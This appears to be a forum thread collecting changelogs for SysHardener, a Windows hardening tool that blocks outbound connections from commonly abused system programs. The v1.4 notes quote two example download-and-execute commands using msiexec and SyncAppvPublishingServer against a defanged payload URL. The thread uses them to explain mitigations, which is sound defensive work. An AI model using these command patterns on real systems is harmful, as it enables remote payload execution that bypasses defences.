http://www.novirusthanks.org/products/syshardener/
For Windows Vista, 7, 8, 10 (32\64-bit)
This free security tool helps you harden Windows settings to mitigate online threats. You can enable UAC (commonly disabled by malware), unassociate bad file types (i.e JS, VBS, VBE, WSH, etc), disable autorun.inf on removable devices, enable DEP and SEH on all programs, turn off Windows Script Host (Wscript.exe), turn on SmartScreen, disable unneeded Windows services, disable Javascript on Adobe Reader, disable macros\OLE\Activex on Office, disable Javascript on Foxit Reader, block outbound connections of commonly hijacked system programs (i.e powershell.exe, wscript.exe, winword.exe, etc) via Windows Firewall rules, and much more. All these system hardening tweaks can help mitigate common today threats. Especially useful also the Windows firewall rules to block outbound connections of powershell, wscript, mshta, winword, excel, etc so an exploit cannot download the remote payload.
https://www.wilderssecurity.com/threads/syshardener-harden-windows-settings.401092/
SysHardener v1.5 Released:
http://www.novirusthanks.org/products/syshardener/
+ Updated Help\FAQs file
+ Added new command-line parameter: /customsettings "C:\Path\To\Settings.ini"
+ Removed button "Un\Select All" -> Use the "Tweaks" menu in the top main menu
+ Added option "Save to .INI file" on "Tweaks" main menu
+ Added option "Load from .INI file" on "Tweaks" main menu
+ New option Block Outbound Connections for Cmstp.exe (checked)
+ New option Block Outbound Connections for Esentutl.exe (checked)
+ New option Block Outbound Connections for Extrac32.exe (checked)
+ New option Block Outbound Connections for Expand.exe (unchecked)
+ New option Block Outbound Connections for Makecab.exe (checked)
+ New option Block Outbound Connections for Pcalua.exe (checked)
+ New option Block Outbound Connections for Print.exe (unchecked)
+ New option Block Outbound Connections for Replace.exe (unchecked)
+ New option Block Outbound Connections for ScriptRunner.exe (checked)
+ New option Block Outbound Connections for Scrcons.exe (checked)
+ New option Block Outbound Connections for Ftp.exe (unchecked)
+ New option Block Outbound Connections for Tftp.exe (unchecked)
+ New option Block Outbound Connections for Telnet.exe (unchecked)
+ Improved detection of Acrobat Reader 11.0
SysHardener v1.4 Released.
http://www.novirusthanks.org/products/syshardener/
Here is the changelog:
+ New option "Block Oubound Connections for SyncAppvPublishing.exe" (checked)
+ New option "Block Oubound Connections for Certutil.exe" (checked)
+ New option "Block Oubound Connections for Msiexec.exe" (unchecked)
+ New option "Block Oubound Connections for Odbcconf.exe" (checked)
+ New option "Block Oubound Connections for AtBroker.exe" (checked)
+ "Block Outbound Connections for Csrss.exe" is checked
+ Added button "Windows Updates" on "System Tools" tab
+ Move progress bar after asking-for\creating restore point
+ Updated help file
Just a quick update to mitigate:
CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV
https://www.bleepingcomputer.com/ne...ckers-to-download-malware-while-bypassing-av/
* Tweak: "Block Oubound Connections for Certutil.exe"
Msiexec.exe could allow attackers to download and execute a remote payload
Example: cmd.exe /c msiexec /q /I "hxxp://127.0.0.1/payload.msi"
* Tweak: "Block Oubound Connections for Msiexec.exe"
SyncAppvPublishing.exe could allow attackers to download and execute a remote payload
Example: SyncAppvPublishingServer.exe ".; *DownloadFile() or DownloadString() or Start-Process mshta.exe hxxp://127.0.0.1/payload.hta"
* Tweak: "Block Oubound Connections for SyncAppvPublishingServer.exe"
SysHardener v1.3 Released.
Released SysHardener v1.3:
http://www.novirusthanks.org/products/syshardener/
Changelog:
+ New option "Disable Loading of DLLs via AppInit_DLLs"
+ New option "Load Only Digitally Signed DLLs via AppInit_DLLs"
+ New option "Disable Windows Subsystem for Linux"
+ Improved "Disable PowerShell v2.0 Engine"
+ Added more "blue" icons that can be clicked to get more info
+ Some "orange" icons can be clicked to get more info
+ Reduced height of the main application window
+ Main application window is sizeable and can be maximized
+ Added "Tweaks" option on top main menu to "select all\suggested tweaks\unselect all" tweaks
+ Minor fixes and optimizations
+ Updated help file
SysHardener v1.1 Released.
Here is the changelog:
+ Fixed tweaks related to Foxit Reader
+ Fixed "Set Macros Security to "Very High" in Kingsoft WPS Office"
+ Enabled "Turn Off WinHTTP Web Proxy Auto-Discovery Service":
*** References: Project Zero: aPAColypse now: Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript
+ Added an "info" icon that on click it opens a web page
+ Ask to create a system restore point
+ Support parameter "/createrestorepoint" from command-line
+ New option "Disable PowerShell Script Execution (Windows 7+)"
+ New option "Restric PowerShell (v3+) to Constrained Language Mode"
+ New option "Configure Behavior of UAC Prompt for Administrators"
+ New option "Configure Behavior of UAC Prompt for Users"
+ Added "System Tools" tab to open useful system tools
+ Minor fixes and optimizations
+ Updated help file
https://www.ghacks.net/2018/02/26/harden-windows-pcs-with-syshardener/
SysHarder is a tweaking software that focuses on security almost exclusively. Run it to make dozens of changes to Windows in a matter of minutes.
While you can make all the changes by yourself, you'd spend more time doing so especially if you don't harden systems all day long as part of your job.